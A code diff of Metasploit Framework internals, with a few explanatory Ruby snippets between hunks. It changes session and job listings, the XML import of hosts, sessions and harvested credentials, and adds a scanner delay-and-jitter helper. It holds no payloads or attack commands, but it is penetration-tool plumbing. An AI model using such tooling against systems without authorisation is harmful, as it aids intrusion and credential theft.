columns << 'Id'
|
||||
columns << 'Type'
|
||||
columns << 'Checkin?' if show_extended
|
||||
columns << 'Local URI' if show_extended
|
||||
columns << 'Information'
|
||||
columns << 'Connection'
|
||||
|
||||
|
@ -558,6 +554,12 @@ class ReadableText
|
|||
else
|
||||
row << '?'
|
||||
end
|
||||
|
||||
if session.exploit_datastore.has_key?('LURI') && !session.exploit_datastore['LURI'].empty?
|
||||
row << " (#{session.exploit_datastore['LURI']})"
|
||||
else
|
||||
row << '?'
|
||||
end
|
||||
end
|
||||
|
||||
row << sinfo
|
||||
|
@ -573,12 +575,8 @@ class ReadableText
|
|||
#
|
||||
# @param framework [Msf::Framework] the framework to dump.
|
||||
# @param opts [Hash] the options to dump with.
|
||||
# @option opts :session_ids [Array] the list of sessions to dump (no
|
||||
# effect).
|
||||
# @return [String] the formatted list of sessions.
|
||||
def self.dump_sessions_verbose(framework, opts={})
|
||||
ids = (opts[:session_ids] || framework.sessions.keys).sort
|
||||
|
||||
out = "Active sessions\n" +
|
||||
"===============\n\n"
|
||||
|
||||
|
@ -597,6 +595,7 @@ class ReadableText
|
|||
sess_type = session.type.to_s
|
||||
sess_uuid = session.payload_uuid.to_s
|
||||
sess_puid = session.payload_uuid.respond_to?(:puid_hex) ? session.payload_uuid.puid_hex : nil
|
||||
sess_luri = session.exploit_datastore['LURI'] || ""
|
||||
|
||||
sess_checkin = "<none>"
|
||||
sess_machine_id = session.machine_id.to_s
|
||||
|
@ -626,6 +625,9 @@ class ReadableText
|
|||
out << " MachineID: #{sess_machine_id}\n"
|
||||
out << " CheckIn: #{sess_checkin}\n"
|
||||
out << " Registered: #{sess_registration}\n"
|
||||
if !sess_luri.empty?
|
||||
out << " LURI: #{sess_luri}\n"
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
@ -645,10 +647,10 @@ class ReadableText
|
|||
# @param col [Integer] the column wrap width.
|
||||
# @return [String] the formatted list of running jobs.
|
||||
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
|
||||
columns = [ 'Id', 'Name', "Payload", "LPORT" ]
|
||||
columns = [ 'Id', 'Name', "Payload", "Payload opts" ]
|
||||
|
||||
if (verbose)
|
||||
columns += [ "URIPATH", "Start Time" ]
|
||||
columns += [ "URIPATH", "Start Time", "Handler opts" ]
|
||||
end
|
||||
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
|
@ -657,33 +659,41 @@ class ReadableText
|
|||
'Columns' => columns
|
||||
)
|
||||
|
||||
# jobs are stored as a hash with the keys being a numeric job_id.
|
||||
framework.jobs.keys.sort{|a,b| a.to_i <=> b.to_i }.each { |k|
|
||||
# jobs are stored as a hash with the keys being a numeric String job_id.
|
||||
framework.jobs.keys.sort_by(&:to_i).each do |job_id|
|
||||
# Job context is stored as an Array with the 0th element being
|
||||
# the running module. If that module is an exploit, ctx will also
|
||||
# contain its payload.
|
||||
ctx = framework.jobs[k].ctx
|
||||
row = [ k, framework.jobs[k].name ]
|
||||
row << (ctx[1].nil? ? (ctx[0].datastore['PAYLOAD'] || "") : ctx[1].refname)
|
||||
exploit_mod, _payload_mod = framework.jobs[job_id].ctx
|
||||
row = []
|
||||
row[0] = job_id
|
||||
row[1] = framework.jobs[job_id].name
|
||||
|
||||
# Make the LPORT show the bind port if it's different
|
||||
local_port = ctx[0].datastore['LPORT']
|
||||
bind_port = ctx[0].datastore['ReverseListenerBindPort']
|
||||
lport = (local_port || "").to_s
|
||||
if bind_port && bind_port != 0 && bind_port != lport
|
||||
lport << " (#{bind_port})"
|
||||
end
|
||||
row << lport
|
||||
pinst = exploit_mod.respond_to?(:payload_instance) ? exploit_mod.payload_instance : nil
|
||||
|
||||
if (verbose)
|
||||
uripath = ctx[0].get_resource if ctx[0].respond_to?(:get_resource)
|
||||
uripath = ctx[0].datastore['URIPATH'] if uripath.nil?
|
||||
row << (uripath || "")
|
||||
row << (framework.jobs[k].start_time || "")
|
||||
if pinst.nil?
|
||||
row[2] = ""
|
||||
row[3] = ""
|
||||
else
|
||||
row[2] = pinst.refname
|
||||
row[3] = ""
|
||||
if pinst.respond_to?(:payload_uri)
|
||||
row[3] << pinst.payload_uri
|
||||
end
|
||||
if pinst.respond_to?(:luri)
|
||||
row[3] << pinst.luri
|
||||
end
|
||||
end
|
||||
|
||||
if verbose
|
||||
uripath = exploit_mod.get_resource if exploit_mod.respond_to?(:get_resource)
|
||||
uripath ||= exploit_mod.datastore['URIPATH']
|
||||
row[4] = uripath
|
||||
row[5] = framework.jobs[job_id].start_time
|
||||
row[6] = pinst.respond_to?(:listener_uri) ? pinst.listener_uri : ""
|
||||
end
|
||||
tbl << row
|
||||
}
|
||||
end
|
||||
|
||||
return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n"
|
||||
end
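The switch to sort_by(&:to_i) matters because job ids are numeric Strings; a plain sort would order them lexicographically:

job_ids = %w[10 2 1 21]
job_ids.sort              # => ["1", "10", "2", "21"]
job_ids.sort_by(&:to_i)   # => ["1", "2", "10", "21"]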
|
||||
|
|
|
@ -27,7 +27,7 @@ module Scriptable
|
|||
|
||||
# Scan all of the path combinations
|
||||
check_paths.each { |path|
|
||||
if ::File.exists?(path)
|
||||
if ::File.exist?(path)
|
||||
full_path = path
|
||||
break
|
||||
end
|
||||
|
|
|
@ -56,11 +56,11 @@ module Exploit
|
|||
# job.
|
||||
#
|
||||
def self.exploit_simple(oexploit, opts, &block)
|
||||
exploit = oexploit.replicant
|
||||
# Trap and print errors here (makes them UI-independent)
|
||||
begin
|
||||
|
||||
# Clone the module to prevent changes to the original instance
|
||||
exploit = oexploit.replicant
|
||||
|
||||
Msf::Simple::Framework.simplify_module( exploit, false )
|
||||
yield(exploit) if block_given?
|
||||
|
||||
|
|
|
@ -30,7 +30,7 @@ module Framework
|
|||
def load(path, opts = {})
|
||||
def_path = Msf::Config.plugin_directory + File::SEPARATOR + path
|
||||
|
||||
if (File.exists?(def_path) or File.exists?(def_path + ".rb"))
|
||||
if (File.exist?(def_path) or File.exist?(def_path + ".rb"))
|
||||
super(def_path, opts)
|
||||
else
|
||||
super
|
||||
|
|
|
@ -49,7 +49,7 @@ module Auxiliary::AuthBrute
|
|||
@@max_per_service = nil
|
||||
end
|
||||
|
||||
# Yields each {Metasploit::Credential::Core} in the {Mdm::Workspace} with
|
||||
# Yields each Metasploit::Credential::Core in the Mdm::Workspace with
|
||||
# a private type of 'ntlm_hash'
|
||||
#
|
||||
# @yieldparam [Metasploit::Credential::Core]
|
||||
|
@ -60,7 +60,7 @@ module Auxiliary::AuthBrute
|
|||
end
|
||||
end
|
||||
|
||||
# Yields each {Metasploit::Credential::Core} in the {Mdm::Workspace} with
|
||||
# Yields each Metasploit::Credential::Core in the Mdm::Workspace with
|
||||
# a private type of 'password'
|
||||
#
|
||||
# @yieldparam [Metasploit::Credential::Core]
|
||||
|
@ -71,7 +71,7 @@ module Auxiliary::AuthBrute
|
|||
end
|
||||
end
|
||||
|
||||
# Yields each {Metasploit::Credential::Core} in the {Mdm::Workspace} with
|
||||
# Yields each Metasploit::Credential::Core in the Mdm::Workspace with
|
||||
# a private type of 'ssh_key'
|
||||
#
|
||||
# @yieldparam [Metasploit::Credential::Core]
|
||||
|
@ -90,7 +90,7 @@ module Auxiliary::AuthBrute
|
|||
(datastore['DB_ALL_CREDS'] || datastore['DB_ALL_PASS'] || datastore['DB_ALL_USERS']) && framework.db.active
|
||||
end
|
||||
|
||||
# This method takes a {Metasploit::Framework::CredentialCollection} and prepends existing NTLMHashes
|
||||
# This method takes a Metasploit::Framework::CredentialCollection and prepends existing NTLMHashes
|
||||
# from the database. This allows the users to use the DB_ALL_CREDS option.
|
||||
#
|
||||
# @param cred_collection [Metasploit::Framework::CredentialCollection]
|
||||
|
@ -105,7 +105,7 @@ module Auxiliary::AuthBrute
|
|||
cred_collection
|
||||
end
|
||||
|
||||
# This method takes a {Metasploit::Framework::CredentialCollection} and prepends existing SSHKeys
|
||||
# This method takes a Metasploit::Framework::CredentialCollection and prepends existing SSHKeys
|
||||
# from the database. This allows the users to use the DB_ALL_CREDS option.
|
||||
#
|
||||
# @param [Metasploit::Framework::CredentialCollection] cred_collection
|
||||
|
@ -120,7 +120,7 @@ module Auxiliary::AuthBrute
|
|||
cred_collection
|
||||
end
|
||||
|
||||
# This method takes a {Metasploit::Framework::CredentialCollection} and prepends existing Password Credentials
|
||||
# This method takes a Metasploit::Framework::CredentialCollection and prepends existing Password Credentials
|
||||
# from the database. This allows the users to use the DB_ALL_CREDS option.
|
||||
#
|
||||
# @param cred_collection [Metasploit::Framework::CredentialCollection]
|
||||
|
@ -135,9 +135,9 @@ module Auxiliary::AuthBrute
|
|||
cred_collection
|
||||
end
|
||||
|
||||
# Takes a {Metasploit::Credential::Core} and converts it into a
|
||||
# {Metasploit::Framework::Credential} and processes it into the
|
||||
# {Metasploit::Framework::CredentialCollection} as dictated by the
|
||||
# Takes a Metasploit::Credential::Core and converts it into a
|
||||
# Metasploit::Framework::Credential and processes it into the
|
||||
# Metasploit::Framework::CredentialCollection as dictated by the
|
||||
# selected datastore options.
|
||||
#
|
||||
# @param [Metasploit::Framework::CredentialCollection] cred_collection the credential collection to add to
|
||||
|
|
|
@ -27,8 +27,8 @@ module Msf
|
|||
def build_probe
|
||||
@probe ||= ::Net::DNS::Packet.new(query_name, query_type_num, query_class_num).data
|
||||
# TODO: support QU vs QM probes
|
||||
# @probe[@probe.size-2] = [0x80].pack('C')
|
||||
# @probe
|
||||
#+ @probe[@probe.size-2] = [0x80].pack('C')
|
||||
#+ @probe
|
||||
end
|
||||
|
||||
def query_class
|
||||
|
|
|
@ -70,7 +70,7 @@ module Auxiliary::Report
|
|||
# This method safely get the workspace ID. It handles if the db is not active
|
||||
#
|
||||
# @return [NilClass] if there is no DB connection
|
||||
# @return [Fixnum] the ID of the current {Mdm::Workspace}
|
||||
# @return [Fixnum] the ID of the current Mdm::Workspace
|
||||
def myworkspace_id
|
||||
if framework.db.active
|
||||
myworkspace.id
|
||||
|
@ -169,7 +169,7 @@ module Auxiliary::Report
|
|||
# should be used directly instead.
|
||||
#
|
||||
# @param opts [Hash] the option hash
|
||||
# @option opts [String] :host the address of the host (also takes a {Mdm::Host})
|
||||
# @option opts [String] :host the address of the host (also takes a Mdm::Host)
|
||||
# @option opts [Fixnum] :port the port of the connected service
|
||||
# @option opts [Mdm::Service] :service an optional Service object to build the cred for
|
||||
# @option opts [String] :type What type of private credential this is (e.g. "password", "hash", "ssh_key")
|
||||
|
|
|
@ -304,6 +304,36 @@ def scanner_show_progress
|
|||
end
|
||||
end
|
||||
|
||||
def add_delay_jitter(_delay, _jitter)
|
||||
# Introduce the delay
|
||||
delay_value = _delay.to_i
|
||||
original_value = delay_value
|
||||
jitter_value = _jitter.to_i
|
||||
|
||||
# Retrieve the jitter value and delay value
|
||||
# Delay = number of milliseconds to wait between each request
|
||||
# Jitter = percentage modifier. For example:
|
||||
# Delay is 1000ms (i.e. 1 second), Jitter is 50.
|
||||
# 50/100 = 0.5; 0.5*1000 = 500. Therefore, the per-request
|
||||
# delay will be 1000 +/- a maximum of 500ms.
|
||||
if delay_value > 0
|
||||
if jitter_value > 0
|
||||
rnd = Random.new
|
||||
if (rnd.rand(2) == 0)
|
||||
delay_value += rnd.rand(jitter_value)
|
||||
else
|
||||
delay_value -= rnd.rand(jitter_value)
|
||||
end
|
||||
if delay_value < 0
|
||||
delay_value = 0
|
||||
end
|
||||
end
|
||||
final_delay = delay_value.to_f / 1000.0
|
||||
vprint_status("Delaying for #{final_delay} second(s) (#{original_value}ms +/- #{jitter_value}ms)")
|
||||
sleep final_delay
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
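A standalone rerun of the arithmetic above, with illustrative inputs and a seeded Random so the outcome is repeatable:

delay_value  = 1000          # milliseconds between requests
jitter_value = 500           # upper bound handed to rand for the offset
rnd = Random.new(1234)       # seeded only to make the example deterministic
if rnd.rand(2) == 0
  delay_value += rnd.rand(jitter_value)
else
  delay_value -= rnd.rand(jitter_value)
end
delay_value = 0 if delay_value < 0
final_delay = delay_value.to_f / 1000.0   # seconds handed to sleep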
|
||||
|
||||
|
|
|
@ -30,7 +30,7 @@ class DataStore < Hash
|
|||
opt = @options[k]
|
||||
unless opt.nil?
|
||||
if opt.validate_on_assignment?
|
||||
unless opt.valid?(v)
|
||||
unless opt.valid?(v, check_empty: false)
|
||||
raise OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'"])
|
||||
end
|
||||
v = opt.normalize(v)
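The validate-on-assignment idea, reduced to a toy Hash subclass (OptionSketch and its length rule are stand-ins, not the real option classes):

class OptionSketch
  def valid?(value, check_empty: true)
    return false if check_empty && value.to_s.empty?
    value.to_s.length <= 255   # stand-in validation rule
  end

  def normalize(value)
    value.to_s.strip
  end
end

class StoreSketch < Hash
  def initialize(options)
    super()
    @options = options
  end

  def []=(key, value)
    opt = @options[key]
    if opt && !opt.valid?(value, check_empty: false)
      raise ArgumentError, "Value '#{value}' is not valid for option '#{key}'"
    end
    super(key, opt ? opt.normalize(value) : value)
  end
end

store = StoreSketch.new('RHOST' => OptionSketch.new)
store['RHOST'] = ' 10.0.0.1 '   # stored as "10.0.0.1"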
|
||||
|
|
|
@ -229,7 +229,7 @@ module Msf::DBManager::Import
|
|||
end
|
||||
|
||||
# This is a text string, let's make sure it's treated as binary
|
||||
data = data.unpack("C*").pack("C*")
|
||||
data.force_encoding(Encoding::ASCII_8BIT)
|
||||
if data and data.to_s.strip.length == 0
|
||||
raise Msf::DBImportError.new("The data provided to the import function was empty")
|
||||
end
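Both the old unpack/pack round-trip and the new force_encoding call leave the data tagged as BINARY; force_encoding simply retags the existing string instead of building a copy:

data = "PK\x03\x04".dup
data.unpack("C*").pack("C*").encoding      # => #<Encoding:ASCII-8BIT> (fresh string)
data.force_encoding(Encoding::ASCII_8BIT)  # retags the same object in place
data.encoding                              # => #<Encoding:ASCII-8BIT>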
|
||||
|
|
|
@ -66,31 +66,31 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
|
||||
# Imports `Mdm::Note` objects from the XML element.
|
||||
#
|
||||
# @param note [REXML::Element] The Note element
|
||||
# @param note [Nokogiri::XML::Element] The Note element
|
||||
# @param allow_yaml [Boolean] whether to allow yaml
|
||||
# @param note_data [Hash] hash containing note attributes to be passed along
|
||||
# @return [void]
|
||||
def import_msf_note_element(note, allow_yaml, note_data={})
|
||||
note_data[:type] = nils_for_nulls(note.elements["ntype"].text.to_s.strip)
|
||||
note_data[:data] = nils_for_nulls(unserialize_object(note.elements["data"], allow_yaml))
|
||||
note_data[:type] = nils_for_nulls(note.at("ntype").text.to_s.strip)
|
||||
note_data[:data] = nils_for_nulls(unserialize_object(note.at("data"), allow_yaml))
|
||||
|
||||
if note.elements["critical"].text
|
||||
note_data[:critical] = true unless note.elements["critical"].text.to_s.strip == "NULL"
|
||||
if note.at("critical").text
|
||||
note_data[:critical] = true unless note.at("critical").text.to_s.strip == "NULL"
|
||||
end
|
||||
if note.elements["seen"].text
|
||||
note_data[:seen] = true unless note.elements["critical"].text.to_s.strip == "NULL"
|
||||
if note.at("seen").text
|
||||
note_data[:seen] = true unless note.at("critical").text.to_s.strip == "NULL"
|
||||
end
|
||||
%W{created-at updated-at}.each { |datum|
|
||||
if note.elements[datum].text
|
||||
note_data[datum.gsub("-","_")] = nils_for_nulls(note.elements[datum].text.to_s.strip)
|
||||
if note.at(datum).text
|
||||
note_data[datum.gsub("-","_")] = nils_for_nulls(note.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
report_note(note_data)
|
||||
end
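The REXML-to-Nokogiri change in this file is mostly mechanical: `element.elements["x"].text` becomes `element.at("x").text`. In miniature:

require 'nokogiri'

note = Nokogiri::XML("<note><ntype>host.info</ntype><data>hello</data></note>").at("note")
note.at("ntype").text   # => "host.info"
note.at("data").text    # => "hello"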
|
||||
|
||||
# Imports web_form element using {Msf::DBManager#report_web_form}.
|
||||
# Imports web_form element using Msf::DBManager#report_web_form.
|
||||
#
|
||||
# @param element [REXML::Element] web_form element.
|
||||
# @param element [Nokogiri::XML::Element] web_form element.
|
||||
# @param options [Hash{Symbol => Object}] options
|
||||
# @option options [Boolean] :allow_yaml (false) Whether to allow YAML when
|
||||
# deserializing params.
|
||||
|
@ -115,7 +115,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
# FIXME https://www.pivotaltracker.com/story/show/46578647
|
||||
# FIXME https://www.pivotaltracker.com/story/show/47128407
|
||||
unserialized_params = unserialize_object(
|
||||
element.elements['params'],
|
||||
element.at('params'),
|
||||
options[:allow_yaml]
|
||||
)
|
||||
info[:params] = nils_for_nulls(unserialized_params)
|
||||
|
@ -124,9 +124,9 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
end
|
||||
end
|
||||
|
||||
# Imports web_page element using {Msf::DBManager#report_web_page}.
|
||||
# Imports web_page element using Msf::DBManager#report_web_page.
|
||||
#
|
||||
# @param element [REXML::Element] web_page element.
|
||||
# @param element [Nokogiri::XML::Element] web_page element.
|
||||
# @param options [Hash{Symbol => Object}] options
|
||||
# @option options [Boolean] :allow_yaml (false) Whether to allow YAML when
|
||||
# deserializing headers.
|
||||
|
@ -162,7 +162,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
# FIXME https://www.pivotaltracker.com/story/show/46578647
|
||||
# FIXME https://www.pivotaltracker.com/story/show/47128407
|
||||
unserialized_headers = unserialize_object(
|
||||
element.elements['headers'],
|
||||
element.at('headers'),
|
||||
options[:allow_yaml]
|
||||
)
|
||||
info[:headers] = nils_for_nulls(unserialized_headers)
|
||||
|
@ -171,9 +171,9 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
end
|
||||
end
|
||||
|
||||
# Imports web_vuln element using {Msf::DBManager#report_web_vuln}.
|
||||
# Imports web_vuln element using Msf::DBManager#report_web_vuln.
|
||||
#
|
||||
# @param element [REXML::Element] web_vuln element.
|
||||
# @param element [Nokogiri::XML::Element] web_vuln element.
|
||||
# @param options [Hash{Symbol => Object}] options
|
||||
# @option options [Boolean] :allow_yaml (false) Whether to allow YAML when
|
||||
# deserializing headers.
|
||||
|
@ -209,7 +209,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
# FIXME https://www.pivotaltracker.com/story/show/46578647
|
||||
# FIXME https://www.pivotaltracker.com/story/show/47128407
|
||||
unserialized_params = unserialize_object(
|
||||
element.elements['params'],
|
||||
element.at('params'),
|
||||
options[:allow_yaml]
|
||||
)
|
||||
info[:params] = nils_for_nulls(unserialized_params)
|
||||
|
@ -232,314 +232,325 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
wspace = args[:wspace] || workspace
|
||||
bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
|
||||
|
||||
doc = rexmlify(data)
|
||||
metadata = check_msf_xml_version!(doc)
|
||||
doc = Nokogiri::XML::Reader.from_memory(data)
|
||||
metadata = check_msf_xml_version!(doc.first.name)
|
||||
allow_yaml = metadata[:allow_yaml]
|
||||
btag = metadata[:root_tag]
|
||||
|
||||
doc.elements.each("/#{btag}/hosts/host") do |host|
|
||||
host_data = {}
|
||||
host_data[:task] = args[:task]
|
||||
host_data[:workspace] = wspace
|
||||
|
||||
# A regression resulted in the address field being serialized in some cases.
|
||||
# Let's handle both instances to keep things happy. See #5837 & #5985
|
||||
addr = nils_for_nulls(host.elements["address"])
|
||||
next unless addr
|
||||
|
||||
# No period or colon means this must be in base64-encoded serialized form
|
||||
if addr !~ /[\.\:]/
|
||||
addr = unserialize_object(addr)
|
||||
end
|
||||
|
||||
host_data[:host] = addr
|
||||
if bl.include? host_data[:host]
|
||||
next
|
||||
else
|
||||
yield(:address,host_data[:host]) if block
|
||||
end
|
||||
host_data[:mac] = nils_for_nulls(host.elements["mac"].text.to_s.strip)
|
||||
if host.elements["comm"].text
|
||||
host_data[:comm] = nils_for_nulls(host.elements["comm"].text.to_s.strip)
|
||||
end
|
||||
%W{created-at updated-at name state os-flavor os-lang os-name os-sp purpose}.each { |datum|
|
||||
if host.elements[datum].text
|
||||
host_data[datum.gsub('-','_')] = nils_for_nulls(host.elements[datum].text.to_s.strip)
|
||||
doc.each do |node|
|
||||
unless node.inner_xml.empty?
|
||||
case node.name
|
||||
when 'host'
|
||||
parse_host(Nokogiri::XML(node.outer_xml).at("./#{node.name}"), wspace, bl, allow_yaml, btag, args, &block)
|
||||
when 'web_site'
|
||||
parse_web_site(Nokogiri::XML(node.outer_xml).at("./#{node.name}"), wspace, bl, allow_yaml, btag, args, &block)
|
||||
when 'web_page', 'web_form', 'web_vuln'
|
||||
send(
|
||||
"import_msf_#{node.name}_element",
|
||||
Nokogiri::XML(node.outer_xml).at("./#{node.name}"),
|
||||
:allow_yaml => allow_yaml,
|
||||
:workspace => wspace,
|
||||
&block
|
||||
)
|
||||
end
|
||||
}
|
||||
host_address = host_data[:host].dup # Preserve after report_host() deletes
|
||||
hobj = report_host(host_data)
|
||||
|
||||
host.elements.each("host_details/host_detail") do |hdet|
|
||||
hdet_data = {}
|
||||
hdet.elements.each do |det|
|
||||
next if ["id", "host-id"].include?(det.name)
|
||||
if det.text
|
||||
hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_host_details(hobj, hdet_data)
|
||||
end
|
||||
|
||||
host.elements.each("exploit_attempts/exploit_attempt") do |hdet|
|
||||
hdet_data = {}
|
||||
hdet.elements.each do |det|
|
||||
next if ["id", "host-id", "session-id", "vuln-id", "service-id", "loot-id"].include?(det.name)
|
||||
if det.text
|
||||
hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_exploit_attempt(hobj, hdet_data)
|
||||
end
|
||||
|
||||
host.elements.each('services/service') do |service|
|
||||
service_data = {}
|
||||
service_data[:task] = args[:task]
|
||||
service_data[:workspace] = wspace
|
||||
service_data[:host] = hobj
|
||||
service_data[:port] = nils_for_nulls(service.elements["port"].text.to_s.strip).to_i
|
||||
service_data[:proto] = nils_for_nulls(service.elements["proto"].text.to_s.strip)
|
||||
%W{created-at updated-at name state info}.each { |datum|
|
||||
if service.elements[datum].text
|
||||
if datum == "info"
|
||||
service_data["info"] = nils_for_nulls(unserialize_object(service.elements[datum], false))
|
||||
else
|
||||
service_data[datum.gsub("-","_")] = nils_for_nulls(service.elements[datum].text.to_s.strip)
|
||||
end
|
||||
end
|
||||
}
|
||||
report_service(service_data)
|
||||
end
|
||||
|
||||
host.elements.each('notes/note') do |note|
|
||||
note_data = {}
|
||||
note_data[:workspace] = wspace
|
||||
note_data[:host] = hobj
|
||||
import_msf_note_element(note,allow_yaml,note_data)
|
||||
end
|
||||
|
||||
host.elements.each('tags/tag') do |tag|
|
||||
tag_data = {}
|
||||
tag_data[:addr] = host_address
|
||||
tag_data[:wspace] = wspace
|
||||
tag_data[:name] = tag.elements["name"].text.to_s.strip
|
||||
tag_data[:desc] = tag.elements["desc"].text.to_s.strip
|
||||
if tag.elements["report-summary"].text
|
||||
tag_data[:summary] = tag.elements["report-summary"].text.to_s.strip
|
||||
end
|
||||
if tag.elements["report-detail"].text
|
||||
tag_data[:detail] = tag.elements["report-detail"].text.to_s.strip
|
||||
end
|
||||
if tag.elements["critical"].text
|
||||
tag_data[:crit] = true unless tag.elements["critical"].text.to_s.strip == "NULL"
|
||||
end
|
||||
report_host_tag(tag_data)
|
||||
end
|
||||
|
||||
host.elements.each('vulns/vuln') do |vuln|
|
||||
vuln_data = {}
|
||||
vuln_data[:workspace] = wspace
|
||||
vuln_data[:host] = hobj
|
||||
vuln_data[:info] = nils_for_nulls(unserialize_object(vuln.elements["info"], allow_yaml))
|
||||
vuln_data[:name] = nils_for_nulls(vuln.elements["name"].text.to_s.strip)
|
||||
%W{created-at updated-at exploited-at}.each { |datum|
|
||||
if vuln.elements[datum] and vuln.elements[datum].text
|
||||
vuln_data[datum.gsub("-","_")] = nils_for_nulls(vuln.elements[datum].text.to_s.strip)
|
||||
end
|
||||
}
|
||||
if vuln.elements["refs"]
|
||||
vuln_data[:refs] = []
|
||||
vuln.elements.each("refs/ref") do |ref|
|
||||
vuln_data[:refs] << nils_for_nulls(ref.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
|
||||
vobj = report_vuln(vuln_data)
|
||||
|
||||
vuln.elements.each("notes/note") do |note|
|
||||
note_data = {}
|
||||
note_data[:workspace] = wspace
|
||||
note_data[:vuln_id] = vobj.id
|
||||
import_msf_note_element(note,allow_yaml,note_data)
|
||||
end
|
||||
|
||||
vuln.elements.each("vuln_details/vuln_detail") do |vdet|
|
||||
vdet_data = {}
|
||||
vdet.elements.each do |det|
|
||||
next if ["id", "vuln-id"].include?(det.name)
|
||||
if det.text
|
||||
vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_vuln_details(vobj, vdet_data)
|
||||
end
|
||||
|
||||
vuln.elements.each("vuln_attempts/vuln_attempt") do |vdet|
|
||||
vdet_data = {}
|
||||
vdet.elements.each do |det|
|
||||
next if ["id", "vuln-id", "loot-id", "session-id"].include?(det.name)
|
||||
if det.text
|
||||
vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_vuln_attempt(vobj, vdet_data)
|
||||
end
|
||||
end
|
||||
|
||||
## Handle old-style (pre 4.10) XML files
|
||||
if btag == "MetasploitV4"
|
||||
if host.elements['creds'].present?
|
||||
unless host.elements['creds'].elements.empty?
|
||||
origin = Metasploit::Credential::Origin::Import.create(filename: "console-import-#{Time.now.to_i}")
|
||||
|
||||
host.elements.each('creds/cred') do |cred|
|
||||
username = cred.elements['user'].try(:text)
|
||||
proto = cred.elements['proto'].try(:text)
|
||||
sname = cred.elements['sname'].try(:text)
|
||||
port = cred.elements['port'].try(:text)
|
||||
|
||||
# Handle blanks by resetting to sane default values
|
||||
proto = "tcp" if proto.blank?
|
||||
pass = cred.elements['pass'].try(:text)
|
||||
pass = "" if pass == "*MASKED*"
|
||||
|
||||
private = create_credential_private(private_data: pass, private_type: :password)
|
||||
public = create_credential_public(username: username)
|
||||
core = create_credential_core(private: private, public: public, origin: origin, workspace_id: wspace.id)
|
||||
|
||||
create_credential_login(core: core,
|
||||
workspace_id: wspace.id,
|
||||
address: hobj.address,
|
||||
port: port,
|
||||
protocol: proto,
|
||||
service_name: sname,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
host.elements.each('sessions/session') do |sess|
|
||||
sess_id = nils_for_nulls(sess.elements["id"].text.to_s.strip.to_i)
|
||||
sess_data = {}
|
||||
sess_data[:host] = hobj
|
||||
%W{desc platform port stype}.each {|datum|
|
||||
if sess.elements[datum].respond_to? :text
|
||||
sess_data[datum.intern] = nils_for_nulls(sess.elements[datum].text.to_s.strip)
|
||||
end
|
||||
}
|
||||
%W{opened-at close-reason closed-at via-exploit via-payload}.each {|datum|
|
||||
if sess.elements[datum].respond_to? :text
|
||||
sess_data[datum.gsub("-","_").intern] = nils_for_nulls(sess.elements[datum].text.to_s.strip)
|
||||
end
|
||||
}
|
||||
sess_data[:datastore] = nils_for_nulls(unserialize_object(sess.elements["datastore"], allow_yaml))
|
||||
if sess.elements["routes"]
|
||||
sess_data[:routes] = nils_for_nulls(unserialize_object(sess.elements["routes"], allow_yaml)) || []
|
||||
end
|
||||
if not sess_data[:closed_at] # Fake a close if we don't already have one
|
||||
sess_data[:closed_at] = Time.now.utc
|
||||
sess_data[:close_reason] = "Imported at #{Time.now.utc}"
|
||||
end
|
||||
|
||||
existing_session = get_session(
|
||||
:workspace => sess_data[:host].workspace,
|
||||
:addr => sess_data[:host].address,
|
||||
:time => sess_data[:opened_at]
|
||||
)
|
||||
this_session = existing_session || report_session(sess_data)
|
||||
next if existing_session
|
||||
sess.elements.each('events/event') do |sess_event|
|
||||
sess_event_data = {}
|
||||
sess_event_data[:session] = this_session
|
||||
%W{created-at etype local-path remote-path}.each {|datum|
|
||||
if sess_event.elements[datum].respond_to? :text
|
||||
sess_event_data[datum.gsub("-","_").intern] = nils_for_nulls(sess_event.elements[datum].text.to_s.strip)
|
||||
end
|
||||
}
|
||||
%W{command output}.each {|datum|
|
||||
if sess_event.elements[datum].respond_to? :text
|
||||
sess_event_data[datum.gsub("-","_").intern] = nils_for_nulls(unserialize_object(sess_event.elements[datum], allow_yaml))
|
||||
end
|
||||
}
|
||||
report_session_event(sess_event_data)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# Import web sites
|
||||
doc.elements.each("/#{btag}/web_sites/web_site") do |web|
|
||||
info = {}
|
||||
info[:workspace] = wspace
|
||||
|
||||
%W{host port vhost ssl comments}.each do |datum|
|
||||
if web.elements[datum].respond_to? :text
|
||||
info[datum.intern] = nils_for_nulls(web.elements[datum].text.to_s.strip)
|
||||
end
|
||||
end
|
||||
|
||||
info[:options] = nils_for_nulls(unserialize_object(web.elements["options"], allow_yaml)) if web.elements["options"].respond_to?(:text)
|
||||
info[:ssl] = (info[:ssl] and info[:ssl].to_s.strip.downcase == "true") ? true : false
|
||||
|
||||
%W{created-at updated-at}.each { |datum|
|
||||
if web.elements[datum].text
|
||||
info[datum.gsub("-","_")] = nils_for_nulls(web.elements[datum].text.to_s.strip)
|
||||
end
|
||||
}
|
||||
|
||||
report_web_site(info)
|
||||
yield(:web_site, "#{info[:host]}:#{info[:port]} (#{info[:vhost]})") if block
|
||||
end
|
||||
|
